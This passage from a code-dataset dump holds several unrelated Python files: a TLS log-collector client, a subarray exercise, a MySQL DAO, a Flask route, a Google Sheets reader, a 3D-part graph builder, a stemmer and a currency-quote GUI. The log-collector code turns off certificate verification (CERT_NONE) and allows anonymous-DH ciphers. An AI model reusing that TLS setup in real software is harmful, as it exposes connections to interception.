self.sock = ssl.wrap_socket(self.sock,\n ssl_version=ssl.PROTOCOL_SSLv23,\n keyfile=self.privKey,\n certfile=self.certif,\n cert_reqs=ssl.CERT_NONE, #ssl.CERT_NONE, #ssl.CERT_REQUIRED,\n ca_certs=self.caCerts,\n ciphers=\"ADH-AES256-SHA256:ALL\")\n try:\n self.sock.connect((srvIP, int(port)))\n except Exception as e:\n self.log.verbose(\"open connection failed:\", str(e))\n self.__close()\n return False\n self.sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)\n self.sock.settimeout(30)\n try:\n name = bytearray(self.name, 'utf-8')\n initMsg = io.BytesIO()\n initMsg.write(struct.pack(' 0 and self.maxPktLen - self.packet.tell() >= 7 + len(self.msgQueue[-1]):\n jMsg = self.msgQueue.pop()\n self.packet.write('DLCM')\n self.packet.write(struct.pack(' 0 and arg[0] != '-':\n posArgs.append(arg)\n # get process type and name from command line arguments\n if len(posArgs) >= 2:\n p = re.compile(\"dirac-([a-zA-Z0-9]+).py\")\n m = p.search(posArgs[0])\n if m is None:\n self.__name = \"???:\"+posArgs[1]\n else:\n self.__name = m.group(1)+\":\"+posArgs[1]\n\n def createHandler(self, parameters=None):\n \"\"\"\n Each backend can initialize its attributes and create its handler with them.\n\n :params parameters: dictionary of parameters. ex: {'FileName': file.log}\n \"\"\"\n enabled = True\n if parameters is None:\n enabled = False\n gLogger.warning(\"LogCollectorBackend: parameters is None\")\n else:\n self.__LogCollectorAddress = parameters.get(\"LogCollectorAddress\", self.__LogCollectorAddress)\n self.__caCertsFile = parameters.get('caCertsFile', self.__caCertsFile)\n try:\n minLevel = parameters.get('minimumLogLevel', \"INFO\")\n self.__minLevel = LogLevels.getLevelValue(minLevel)\n except:\n pass\n\n self.__LogCollectorAddress = ','.join([a for a in [a.strip() for a in self.__LogCollectorAddress.split(\",\")] if a != \"\"])\n\n if self.__caCertsFile == \"\":\n self.__caCertsFile = getCAsLocation()\n if self.__caCertsFile == False:\n gLogger.error(\"can't locate the CA certs directory\")\n enabled = False\n else:\n self.__caCertsFile += \"/cas.pem\"\n if not os.path.isfile(self.__caCertsFile):\n gLogger.error(\"caCertsFile '\"+self.__caCertsFile+\"' doesn't exist or is not a regular file\")\n enabled = False\n\n self.__certKeyFiles = getHostCertificateAndKeyLocation()\n if self.__certKeyFiles == False:\n gLogger.error(\"can't locate the host certificate and private key files\")\n enabled = False\n else:\n self.__certFile = self.__certKeyFiles[0]\n self.__keyFile = self.__certKeyFiles[1]\n\n if not enabled:\n gLogger.error(\"LogCollectorBackend is not enabled\")\n\n self._handler = LogCollectorHandler(\n self.__LogCollectorAddress, \n self.__keyFile, \n self.__certFile, \n self.__caCertsFile, \n self.__minLevel,\n self.__name,\n enabled)\n\n def setLevel(self, level):\n \"\"\"\n Set the log level of the LogCollector handler. \n\n :params level: integer the logging level value to set.\n \"\"\"\n if self._handler is not None:\n self._handler.setLevel(level)\n","repo_name":"chmike/LogCollectorClient","sub_path":"LogCollectorBackend.py","file_name":"LogCollectorBackend.py","file_ext":"py","file_size_in_byte":12779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42839792566","text":"# Product subarray\n\n\ndef product(values):\n if not values:\n return values\n\n max_product = values[0]\n max_index = (0, 0)\n for i in range(len(values)):\n sub_product = 1\n for j in range(i, len(values)):\n sub_product *= values[j]\n if sub_product > max_product:\n max_product = sub_product\n max_index = (i, j)\n return values[max_index[0] : max_index[1] + 1]\n\n\ndef test():\n result = product([-3.2, 4.2, 7, 5.4, -2.2, -2.5])\n assert result == [-3.2, 4.2, 7, 5.4, -2.2]\n","repo_name":"stsewd/devsucodejam-2019","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"26543702626","text":"# Imports\nfrom mysql.connector import connect\nfrom BD.banco import connection\n\n# Tabela\nmodel_name = \"funcao\"\n\n\n# Query que lista tudo da tabela\ndef listar():\n cursor = connection.cursor()\n cursor.execute(f\"SELECT * FROM {model_name};\")\n rows = cursor.fetchall()\n registros = []\n for (id_funcao, funcao) in rows:\n registros.append(\n {\"id_funcao\": id_funcao, \"funcao\": funcao})\n \n cursor.close()\n return registros\n\n# Query que consulta por ID a tabela\ndef consultar(id):\n cursor = connection.cursor()\n cursor.execute(\n f\"SELECT * FROM {model_name} WHERE id_funcao = %s\", (id,))\n row = cursor.fetchone()\n if row is None:\n return None\n \n cursor.close()\n return ({\"id_funcao\": row[0], \"funcao\": row[1]})\n","repo_name":"AlexandreMarq/api_python","sub_path":"Backend/infra/funcao/funcao_dao.py","file_name":"funcao_dao.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10547924466","text":"## Questão 13 - Crie um programa que leia uma lista de palavras do usuário \r\n# e exiba somente as palavras que começam com a letra \"a\".\r\n\r\ntam = int(input('Insira o tamanho da lista: '))\r\nlista = [tam]\r\n\r\ninicialA = []\r\n\r\nfor i in range(tam):\r\n palavra = str(input('Insira a palavra: '))\r\n lista.append(palavra)\r\n if palavra.startswith('a'):\r\n inicialA.append(palavra)\r\n\r\nprint(f'Palavras da lista com inicial \"a\": {inicialA}')\r\n","repo_name":"niickol4s/PEED-LISTA1","sub_path":"questao13.py","file_name":"questao13.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39345910372","text":"\nfrom flask import Flask\nimport json\n\n\napp = Flask(__name__)\n\n\n@app.route('/hello')\ndef greet():\n result = {'foo': 'bar',\n 'value': 42}\n\n return json.dumps(result)\n\n\nif __name__ == '__main__':\n app.run(port=8000)\n","repo_name":"cs220s23/sys_admin","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12231490560","text":"import os\nimport sys\n\ntry:\n from PySide2.QtCore import *\n from PySide2.QtGui import *\n from PySide2.QtWidgets import *\n\n psVersion = 2\nexcept:\n from PySide.QtCore import *\n from PySide.QtGui import *\n\n psVersion = 1\n\ngLibs = os.path.abspath(\n os.path.join(__file__, os.pardir, os.pardir, os.pardir, \"PythonLibs\", \"GoogleDocs\")\n)\nif gLibs not in sys.path:\n sys.path.append(gLibs)\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nfrom PrismUtils.Decorators import err_catcher\n\n\nclass GoogleDocs(QDialog):\n def __init__(self, core, authorizationfile):\n super(GoogleDocs, self).__init__()\n self.core = core\n self.authorize(authorizationfile)\n\n @err_catcher(name=__name__)\n def authorize(self, authorizationfile):\n scope = [\n \"https://spreadsheets.google.com/feeds\",\n \"https://www.googleapis.com/auth/drive\",\n ]\n creds = ServiceAccountCredentials.from_json_keyfile_name(\n authorizationfile, scope\n )\n self.client = gspread.authorize(creds)\n\n @err_catcher(name=__name__)\n def getRows(self, docName, sheetName, columns, fromRow=-1, toRow=-1):\n sheet = self.client.open(docName).worksheet(sheetName)\n colVals = []\n for col in columns:\n colVals.append(sheet.col_values(col))\n\n if not colVals:\n return\n\n entities = []\n rows = range(len(colVals[0]))\n if toRow != -1:\n rows = rows[:(toRow)]\n if fromRow != -1:\n rows = rows[(fromRow - 1):]\n for i in rows:\n entity = [x[i] if len(x) > i else \"\" for x in colVals]\n entities.append(entity)\n\n return entities\n\n @err_catcher(name=__name__)\n def getAllData(self, docName, sheetName, fromRow=-1, toRow=-1):\n sheet = self.client.open(docName).worksheet(sheetName)\n data = sheet.get_all_values()\n\n if toRow != -1:\n data = data[:toRow]\n if fromRow != -1:\n data = data[(fromRow-1):]\n\n return data\n\n\ndef readGDocs(core, authorizationfile, docName, sheetName, fromRow, toRow, columns=None):\n gd = GoogleDocs(core, authorizationfile)\n if columns:\n data = gd.getRows(docName, sheetName, columns, fromRow, toRow)\n else:\n data = gd.getAllData(docName, sheetName, fromRow, toRow)\n\n return data\n","repo_name":"RichardFrangenberg/Prism","sub_path":"Prism/Scripts/PrismUtils/GoogleDocs.py","file_name":"GoogleDocs.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":267,"dataset":"github-code","pt":"52"} +{"seq_id":"11082161072","text":"import os\nimport sys\n\nBASE_PATH = os.path.dirname(__file__)\nsys.path.append(BASE_PATH)\nfrom dataset_util import Dataset\nfrom mesh_util import load_pc, get_pc, draw_boxes3d, get_bbox_volume, get_bbox_extent\nfrom partnet_config import cfg\nfrom partnet_meta_constructor import PartnetMetaConstructor\nfrom partnet_bbox_constructor import PartnetBBoxDataset\nfrom preprocess import *\nfrom gjk import gjk_calc\nfrom multiprocessing import Process\n\nimport trimesh\nimport pymesh\nimport random\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom tqdm import tqdm\n\nfrom itertools import combinations\n\n\nclass PartnetAdjacencyConstructor():\n def __init__(self, meta_constructor, graph_dir=None):\n self.meta_constructor = meta_constructor\n self.meta = self.meta_constructor.df\n self.parts = self.meta_constructor.parts\n self.part_parent_child = self.meta_constructor.part_parent_child\n self.part_sibling = self.meta_constructor.part_sibling\n self.part_leaf = self.meta_constructor.part_leaf\n\n self.bbox_dataset = PartnetBBoxDataset(self.meta_constructor)\n\n if graph_dir is None:\n self.graph_dir = cfg.graph_dir\n else:\n self.graph_dir = graph_dir\n\n def _get_part_of_instance(self, item_id):\n all_parts = self.parts[self.parts['item_id'] == item_id]['global_id']\n joined_parts_id = self.part_leaf[self.part_leaf['leaf_global_id'].isin(all_parts)]['leaf_global_id']\n joined_parts = self.parts[self.parts['global_id'].isin(joined_parts_id)]\n return joined_parts\n\n @staticmethod\n def _load_mesh(desc):\n path = desc['objs_dir']\n objs = desc['objs']\n mesh_list = []\n for obj in eval(objs):\n obj_path = os.path.join(path, obj + '.obj')\n mesh_tmp = load_pc(obj_path)\n mesh_tmp, info = pymesh.remove_isolated_vertices(mesh_tmp)\n mesh_list.append(mesh_tmp)\n mesh = pymesh.merge_meshes(mesh_list)\n return mesh\n\n def construct_adj_graph(self, verbose=False, use_cache=True):\n if use_cache:\n return None\n\n if verbose:\n from mayavi import mlab\n\n index_list = list(self.meta.index)\n progress = tqdm(index_list)\n for item_id in progress:\n if verbose:\n print(\"============\")\n leaf_desc = self._get_part_of_instance(item_id)\n leaf_id = list(leaf_desc['global_id'])\n leaf_bbox = [self.bbox_dataset[id] for id in leaf_id]\n mesh_list = []\n for i in range(len(leaf_desc)):\n mesh_list.append(self._load_mesh(leaf_desc.iloc[i]))\n leaf_id_map = {leaf_id[i]: i for i in range(0, len(leaf_id))}\n\n adj_mat = np.eye(len(leaf_id))\n adj_dir_mat = np.eye(len(leaf_id))\n if verbose:\n print(leaf_id_map)\n for id_a, id_b in combinations(leaf_id, 2):\n bbox_a = leaf_bbox[leaf_id_map[id_a]]\n bbox_b = leaf_bbox[leaf_id_map[id_b]]\n try:\n bbox_dist = gjk_calc.calc(bbox_a, bbox_b)\n except Exception as e:\n progress.write(e)\n progress.write('=======')\n progress.write('GJK Error Detected for {}'.format(item_id))\n progress.write('More information:')\n progress.write(self.meta.iloc[item_id])\n bbox_dist = 10.0\n adj_mat[leaf_id_map[id_a], leaf_id_map[id_b]] = bbox_dist\n adj_mat[leaf_id_map[id_b], leaf_id_map[id_a]] = bbox_dist\n if get_bbox_volume(bbox_a) >= get_bbox_volume(bbox_b):\n adj_dir_mat[leaf_id_map[id_a], leaf_id_map[id_b]] = bbox_dist\n adj_dir_mat[leaf_id_map[id_b], leaf_id_map[id_a]] = 1.0\n else:\n adj_dir_mat[leaf_id_map[id_a], leaf_id_map[id_b]] = 1.0\n adj_dir_mat[leaf_id_map[id_b], leaf_id_map[id_a]] = bbox_dist\n if verbose:\n print(adj_mat)\n for mesh in mesh_list:\n mlab.triangular_mesh(mesh.vertices[:, 0], mesh.vertices[:, 1], mesh.vertices[:, 2], mesh.faces)\n draw_boxes3d(np.stack(leaf_bbox))\n mlab.show()\n adj_res = adj_mat.copy()\n adj_res = np.logical_not(adj_res).astype(np.int)\n adj_dir_res = adj_dir_mat.copy()\n adj_dir_res = np.logical_not(adj_dir_res).astype(np.int)\n\n # dump things\n with open(os.path.join(self.graph_dir, str(item_id) + '_mapping.pkl'), \"wb\") as stream:\n pickle.dump(leaf_id_map, stream)\n np.savetxt(os.path.join(self.graph_dir, str(item_id) + '_dist.txt'), adj_mat)\n np.savetxt(os.path.join(self.graph_dir, str(item_id) + '.txt'), adj_res)\n np.savetxt(os.path.join(self.graph_dir, str(item_id) + '_dist_directional.txt'), adj_dir_mat)\n np.savetxt(os.path.join(self.graph_dir, str(item_id) + '_directional.txt'), adj_dir_res)\n\n\nclass PartnetAdjacencyDataset(Dataset):\n def __init__(self, meta_constructor, graph_dir=None):\n self.meta_constructor = meta_constructor\n self.meta = self.meta_constructor.df\n self.bbox_dataset = PartnetBBoxDataset(self.meta_constructor)\n\n if graph_dir is None:\n self.graph_dir = cfg.graph_dir\n else:\n self.graph_dir = graph_dir\n\n @staticmethod\n def toposort(adjmat):\n closed = []\n adjmat = adjmat.copy()\n try:\n vertmap = np.arange(adjmat.shape[0])\n except Exception as exc:\n return [0]\n\n while vertmap.size > 0:\n indegree = np.sum(adjmat, axis=0)\n picked = np.random.choice(np.where(indegree == 0)[0])\n closed.append(vertmap[picked])\n vertmap = np.delete(vertmap, picked, axis=0)\n adjmat = np.delete(np.delete(adjmat, picked, axis=0), picked, axis=1)\n return closed\n\n def __getitem__(self, index):\n adjmat = np.loadtxt(os.path.join(self.graph_dir, '{}_directional.txt'.format(index)))\n with open(os.path.join(self.graph_dir, '{}_mapping.pkl'.format(index)), \"rb\") as stream:\n idmap = pickle.load(stream)\n rev_idmap = {v: k for k, v in idmap.items()}\n sortee = self.toposort(adjmat)\n res = [self.bbox_dataset[rev_idmap[idx]] for idx in sortee]\n return res\n\n def __len__(self):\n return len(self.meta)\n\n\nif __name__ == '__main__':\n m = PartnetMetaConstructor(cfg.partnet)\n m.construct_meta()\n # a = PartnetAdjacencyConstructor(m)\n # a.construct_adj_graph(use_cache=False)\n d = PartnetAdjacencyDataset(m)\n for idx in range(len(d)):\n print([get_bbox_extent(bbox) for bbox in d[idx]])\n","repo_name":"kelvin34501/partnet_random_stuff","sub_path":"dataset/partnet_adj_constructor.py","file_name":"partnet_adj_constructor.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8748139445","text":"from flask import Blueprint, request\nfrom model.airline_model import Airline\nimport json \n\nconfig = open('config.json','r') \nconfig = json.loads(config.read())\n\nBlueprint_Airline = Blueprint('airline',__name__,url_prefix='/api/airline') \n\n@Blueprint_Airline.route('/',methods=['GET'])\ndef Search():\n query_string = str(request.query_string).replace('b','').replace(\"'\",'').split('=')\n target_name = query_string[0]\n target = query_string[1]\n if(query_string[0] == 'iata'):\n results = Airline.query.filter_by(iata=target).all()\n elif(query_string[0] == 'icao'):\n results = Airline.query.filter_by(icao=target).all()\n \n if(len(results)> 0):\n exportResults = {}\n for result in results:\n icao = result.icao\n iata = result.iata \n name = result.name \n callsign = result.callsign \n logo = result.logo\n country = result.country \n exportResults[icao] = {\n 'icao' : icao,\n 'iata' : iata,\n 'name' : name,\n 'callsign' : callsign,\n 'country' : country,\n 'logo' : logo \n }\n\n exportjson = json.dumps(exportResults)\n return exportjson\n else:\n return 'Not Found' \n","repo_name":"kococo-code/FlightDataServer","sub_path":"route/airline.py","file_name":"airline.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33383280665","text":"\"\"\"Stemming the given line\"\"\"\r\nimport re\r\n\r\n_c = \"[^aeiou]\" # consonant\r\n_v = \"[aeiouy]\" # vowel\r\n_C = _c + \"[^aeiouy]*\" # consonant sequence\r\n_V = _v + \"[aeiou]*\" # vowel sequence\r\n\r\nMgre0 = re.compile(\"^(\" + _C + \")?\" + _V + _C) # [C]VC... is m>0\r\nMeq1 = re.compile(\"^(\" + _C + \")?\" + _V + _C +\"(\" + _V + \")\"+ \"?\" + \"$\") # [C]VC[V] is m=1\r\nMgre1 = re.compile(\"^(\" + _C + \")?\" + _V + _C + _V + _C) # [C]VCVC... is m>1\r\nCVCending = re.compile(_C + _v + \"[^aeiouwxy]$\")\r\nvstem = re.compile(\"^(\" + _C + \")?\" + _v) # vowel in stem\r\nDoubleConsonant= re.compile(r\"([^aeiouylsz])\\1$\") #matches double consonants excpet l s and z\r\nremoveEndingPunc = re.compile(r\"[^a-z]+$\")\r\ndef stem(parms):\r\n stems = []\r\n for word in parms:\r\n\r\n ######## step 0 pre-process words\r\n word = word.lower()\r\n word = re.sub(removeEndingPunc,\"\",word)\r\n\r\n if len(word) < 3: # don't stem if word smaller than 3\r\n stems.append(word)\r\n continue\r\n if word[0] == 'y': word = 'Y' + word[1:] # make sure initial Y is not considered a vowel\r\n\r\n\r\n if word[-1] == 's' and word[-2] != 's':\r\n if word[-4:] == 'sses':\r\n word = word[:-4] + 'ss'\r\n elif word[-3:] == 'ies':\r\n word = word[:-3] + 'i'\r\n else:\r\n word = word[:-1]\r\n\r\n flag = None # only set to 1 2nd and 3rd steps are taken\r\n if word[-3:] == 'eed': # m>0 eed -> ee\r\n if Mgre0.search(word[:-3]):\r\n word = word[:-3] + \"ee\"\r\n\r\n elif word[-2:] == 'ed': # *v* ed\r\n if vstem.search(word[:-2]):\r\n word = word[:-2]\r\n flag = 1\r\n elif word[-3:] == 'ing': # *v* ing\r\n if vstem.search(word[:-3]):\r\n word = word[:-3]\r\n flag = 1\r\n\r\n if flag: # go on to part 1b2\r\n if word[-2:] == 'at': # at -> ate\r\n word = word[:-2] + 'ate'\r\n elif word[-2:] == 'bl': \r\n word = word[:-2] + 'ble'\r\n elif word[-2:] == 'iz': \r\n word = word[:-2] + 'ize'\r\n elif DoubleConsonant.search(word): \r\n word = word[:-1] \r\n elif CVCending.search(word) and Meq1.search(word): \r\n word = word + 'e' # add an e\r\n\r\n\r\n if word != '':\r\n #if not wordnet.synsets(word):\r\n stems.append(word)\r\n\r\n return stems\r\n","repo_name":"IamRitz/Tweets-Classification","sub_path":"stemming.py","file_name":"stemming.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70450412965","text":"# Miniprojeto de Tkinter (Sistema de Cotação de Moedas)\r\nimport tkinter as tk # importa todo módulo Tkinter\r\nimport requests\r\nfrom tkinter import ttk # Extensão para criação de lista suspensa (combobox)\r\nfrom tkinter import *\r\nimport re\r\nfrom datetime import datetime, timedelta\r\nfrom tkinter.filedialog import askopenfilename\r\nimport pandas as pd\r\nimport os\r\n\r\n# Cria um dicionário com os códigos das moedas disponíveis do awesome API\r\nrequisicao = requests.get('https://economia.awesomeapi.com.br/json/all')\r\nrequisicao = requisicao.json()\r\ncod_moedas = {}\r\nfor item in requisicao:\r\n for item2 in requisicao[item]:\r\n if item2 == 'name':\r\n cod_moedas[item] = requisicao[item]['name'].replace('/Real Brasileiro', '')\r\n\r\n\r\ndef periodo_cotacao(primeiro_dia, ultimo_dia):\r\n # Dia inicial e dia final no formato \"yyyy/mm/dd\"\r\n dia_inicial = datetime.strptime(primeiro_dia, \"%Y/%m/%d\")\r\n dia_final = datetime.strptime(ultimo_dia, \"%Y/%m/%d\")\r\n\r\n # Lista para armazenar os dias\r\n dias_periodo = []\r\n\r\n # Adiciona o dia inicial à lista\r\n dias_periodo.append(dia_inicial)\r\n\r\n # Incrementa um dia por vez e adiciona à lista até chegar ao dia final\r\n while dia_inicial < dia_final:\r\n dia_inicial += timedelta(days=1)\r\n dias_periodo.append(dia_inicial)\r\n # Formata os dias para o período usado\r\n for i, dia in enumerate(dias_periodo):\r\n dias_periodo[i] = dia.strftime(\"%d/%m/%y\")\r\n return dias_periodo\r\n\r\n\r\n# Fç que transforma a data de um formatdo de entrada para outro de saída\r\ndef formata_data(data, formato_entrada, formato_saida=\"%Y/%m/%d\"):\r\n data_formatada = datetime.strptime(data, formato_entrada)\r\n data_formatada = data_formatada.strftime(formato_saida)\r\n return data_formatada\r\n\r\n\r\n# Lista contendo os possíveis formatos de data\r\nformato_data = [\"YYYY-MM-DD\", \"DD-MM-YYYY\", \"DD/MM/YYYY\", \"YYYY/MM/DD\", \"DD/MM/YY\", \"DD-MM-YY\"]\r\n\r\n\r\n# Verifica se a data pertence a algum dos 4 padrões de data e, caso, positivo, retorna a data num formato padrão\r\n# (\"%Y/%m/%d\")\r\ndef verificar_formato_data(data, formato):\r\n for u in formato:\r\n if u == \"DD-MM-YYYY\":\r\n padrao = r\"\\d{2}-\\d{2}-\\d{4}\"\r\n if re.fullmatch(padrao, data):\r\n return True, formata_data(data, \"%d-%m-%Y\")\r\n elif u == \"DD/MM/YYYY\":\r\n padrao = r\"\\d{2}/\\d{2}/\\d{4}\"\r\n if re.fullmatch(padrao, data):\r\n return True, formata_data(data, \"%d/%m/%Y\")\r\n elif u == \"YYYY/MM/DD\":\r\n padrao = r\"\\d{4}/\\d{2}/\\d{2}\"\r\n if re.fullmatch(padrao, data):\r\n return True, formata_data(data, \"%Y/%m/%d\")\r\n elif u == \"YYYY-MM-DD\":\r\n padrao = r\"\\d{4}-\\d{2}-\\d{2}\"\r\n if re.fullmatch(padrao, data):\r\n return True, formata_data(data, \"%Y-%m-%d\")\r\n elif u == \"DD-MM-YY\":\r\n padrao = r\"\\d{2}-\\d{2}-\\d{2}\"\r\n if re.fullmatch(padrao, data):\r\n return True, formata_data(data, \"%d-%m-%y\")\r\n elif u == \"DD/MM/YY\":\r\n padrao = r\"\\d{2}/\\d{2}/\\d{2}\"\r\n if re.fullmatch(padrao, data):\r\n return True, formata_data(data, \"%d/%m/%y\")\r\n else:\r\n return False, None\r\n\r\n\r\n# Função que transforma timestamp em data\r\ndef transforma_timestamp(tmstp):\r\n data_real = datetime.fromtimestamp(int(tmstp))\r\n data_real = data_real.strftime('%d/%m/%y')\r\n return data_real\r\n\r\n\r\n# Função para filtrar os itens da lista suspensa\r\ndef filter_combobox(*args):\r\n typed_text = moeda_var.get()\r\n filtered_items = []\r\n for v in moedas:\r\n if typed_text.lower() in v.lower():\r\n filtered_items.append(v)\r\n moeda['values'] = filtered_items\r\n\r\n\r\n# Função que realiza o pedido de request\r\ndef realizar_request(url):\r\n headers = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) \"\r\n \"Chrome/114.0.5735.199 Safari/537.36\"}\r\n try:\r\n response = requests.get(url, headers=headers)\r\n response.raise_for_status() # Verifica se houve algum erro na resposta\r\n return response.json()\r\n except requests.exceptions.HTTPError as errh:\r\n print(\"Erro HTTP:\", errh)\r\n except requests.exceptions.ConnectionError as errc:\r\n print(\"Erro de conexão:\", errc)\r\n except requests.exceptions.Timeout as errt:\r\n print(\"Timeout de conexão:\", errt)\r\n except requests.exceptions.RequestException as err:\r\n print(\"Erro durante a solicitação:\", err)\r\n return None\r\n\r\n\r\n# Função para buscar a cotação da API, onde cod_moeda é o cod da moeda, di é o dia inicial e df o dia final\r\ndef awesome_api(cod_moeda, di, df):\r\n print(cod_moeda)\r\n hj = datetime.now() # Pega a data de hoje\r\n data_hj = hj.strftime(\"%Y/%m/%d\")\r\n print(data_hj)\r\n if verificar_formato_data(di, formato_data)[0] and verificar_formato_data(df, formato_data)[0]:\r\n if type(cod_moeda) != list: # COTAÇÃO ESPECÍFICA (não é lista)\r\n if verificar_formato_data(di, formato_data)[1] > data_hj or verificar_formato_data(df, formato_data)[1] > \\\r\n data_hj: # Dia selecionado superior ao dia de hj\r\n mensagem_cotacao = tk.Label(text=\"Data selecionada superior a data de hoje!\", fg='black', bg='#b0e0e6')\r\n mensagem_cotacao.grid(row=3, column=0, columnspan=2, sticky=\"NSEW\") # Adiciona o label à janela\r\n elif data_hj == verificar_formato_data(di, formato_data)[1]: # Se a data selecionada for igual ao dia de hj\r\n url_hoje = 'https://economia.awesomeapi.com.br/last/' + cod_moeda\r\n cotacao = realizar_request(url_hoje)[cod_moeda + 'BRL']['bid']\r\n else: # Se a data selecionada não for o dia de hj\r\n dia = verificar_formato_data(di, formato_data)[1].replace('/', '')\r\n url_diario = f\"https://economia.awesomeapi.com.br/json/daily/\" \\\r\n f\"{cod_moeda}-BRL?start_date={dia}&end_date={dia}\"\r\n cotacao = realizar_request(url_diario)[0]['bid']\r\n return cotacao\r\n else: # MÚLTIPLAS COTAÇÕES (o número máximo de resultados é 360)\r\n dia1 = verificar_formato_data(di, formato_data)[1]\r\n dia2 = verificar_formato_data(df, formato_data)[1]\r\n # Se os dias solicitados forem maiores que o atual, a cotação será buscada até o dia atual\r\n if dia1 > data_hj:\r\n dia1 = data_hj\r\n if dia2 > data_hj:\r\n dia2 = data_hj\r\n periodo = periodo_cotacao(dia1, dia2) # Cria uma lista do período da cotação\r\n mult_cotacoes = []\r\n for cod in cod_moeda:\r\n dia1 = dia1.replace('/', '')\r\n dia2 = dia2.replace('/', '')\r\n url_mult = f\"https://economia.awesomeapi.com.br/json/daily/{cod}-BRL/\" \\\r\n f\"360?start_date={dia1}&end_date={dia2}\"\r\n cotacoes = realizar_request(url_mult)\r\n cotacao_moeda = len(periodo)*['']\r\n for cotacao in cotacoes:\r\n print('cotacao', cotacao)\r\n data_transf = transforma_timestamp(cotacao['timestamp'])\r\n for i, dia in enumerate(periodo):\r\n if dia == data_transf:\r\n cotacao_moeda[i] = float(cotacao['bid'])\r\n print(cotacao_moeda)\r\n # Caso a API não retorne uma cotação, é feito um request específico para os dias faltantes\r\n for i, cotacao in enumerate(cotacao_moeda):\r\n if cotacao == '':\r\n dia = formata_data(periodo[i], \"%d/%m/%y\", \"%Y/%m/%d\").replace('/', '')\r\n url_diario = f\"https://economia.awesomeapi.com.br/json/daily/\" \\\r\n f\"{cod}-BRL?start_date={dia}&end_date={dia}\"\r\n try: # Caso a cotação não seja pega no request do período\r\n cotacao_moeda[i] = float(realizar_request(url_diario)[0]['bid'])\r\n except IndexError: # Caso o dia pleiteado seja final de semana\r\n cotacao_moeda[i] = cotacao_moeda[i - 1]\r\n mult_cotacoes.append(cotacao_moeda)\r\n cotacao_moeda.insert(0, cod)\r\n cotacao_moeda = len(periodo) * ['']\r\n periodo.insert(0, 'Data')\r\n mult_cotacoes.insert(0, periodo)\r\n # print(mult_cotacoes)\r\n return mult_cotacoes\r\n\r\n\r\n# Função que busca a cotação para a moeda e data selecionadas qdo a tecla \"Pegar Cotação for acionada\r\ndef buscar_cotacao():\r\n moeda_preenchida = moeda.get()\r\n data_preenchida = data_cotacao.get()\r\n if moeda_preenchida and data_preenchida: # A rotina não continua se a moeda e data não foram selecionadas\r\n print('moeda preenchida', moeda_preenchida)\r\n for cod in cod_moedas:\r\n if cod_moedas[cod] == moeda_preenchida:\r\n cod_moeda = cod\r\n print(cod_moeda)\r\n mensagem_cotacao = tk.Label(text=\"Cotação não encontrada\", fg='black', bg='#b0e0e6') # Texto de msg não\r\n # encontrada\r\n mensagem_cotacao.grid(row=3, column=0, columnspan=2, sticky=\"NSEW\") # Adiciona o label à janela\r\n if cod_moeda:\r\n cotacao = awesome_api(cod_moeda, data_preenchida, data_preenchida)\r\n # Altera o label mensagem_cotaçao\r\n mensagem_cotacao[\"text\"] = f'Cotação do {moeda_preenchida} é de {cotacao} reais'\r\n else:\r\n mensagem_cotacao = tk.Label(text=\"Moeda ou data não preenchidas\", fg='black', bg='#b0e0e6')\r\n mensagem_cotacao.grid(row=3, column=0, columnspan=2, sticky=\"NSEW\") # Adiciona o label à janela\r\n\r\n\r\nlst_moedas = [] # Será uma variável global para conectar a fç selecionar_arquivo() e atualizar_cotacao()\r\n\r\n\r\n# Função que abre uma janela para selecionar o arquivo desejado\r\ndef selecionar_arquivo():\r\n global lst_moedas\r\n try:\r\n caminho_arquivo = askopenfilename(title=\"Selecione um arquivo em Excel para abrir\")\r\n df = pd.read_excel(caminho_arquivo)\r\n mensagem_caminho_arquivo_entrada['text'] = caminho_arquivo # Atualiza o caminho do arquivo\r\n lst_moedas = list(df.iloc[:, 0])\r\n return lst_moedas\r\n except:\r\n mensagem_caminho_arquivo_entrada['text'] = 'Arquivo inválido!'\r\n\r\n\r\n# Função que atualiza as cotações para as moedas selecionadas\r\ndef atualizar_cotacao():\r\n global lst_moedas\r\n print(lst_moedas)\r\n data_inicial_preenchida = data_inicial.get()\r\n data_final_preenchida = data_final.get()\r\n if data_inicial_preenchida and data_final_preenchida: # A rotina não continua se moeda/ data não forem selecionadas\r\n mult_cotacoes = awesome_api(lst_moedas, data_inicial_preenchida, data_final_preenchida)\r\n df = pd.DataFrame(mult_cotacoes) # Cria um DataFrame para incluir as infos de cotação\r\n # Salva o DataFrame num arquivo do Excel\r\n df.to_excel(f'mult_cotacoes{datetime.now().strftime(\"%d/%m/%y/%H/%M/%S\").replace(\"/\",\"\")}.xlsx', index=False)\r\n mensagem_arquivo_atualizado[\"text\"] = \"Arquivo de moedas atualizado com sucesso.\"\r\n\r\n\r\n# inicia janela\r\njanela = tk.Tk()\r\n\r\n# Criar a variável de controle do combobox\r\nmoeda_var = StringVar()\r\n\r\n# Cria uma lista suspensa (janela é onde irá aparecer a lista suspensa e values é a lista de valores)\r\nmoeda = ttk.Combobox(janela, textvariable=moeda_var)\r\nmoeda.grid(row=1, column=2, padx=10, 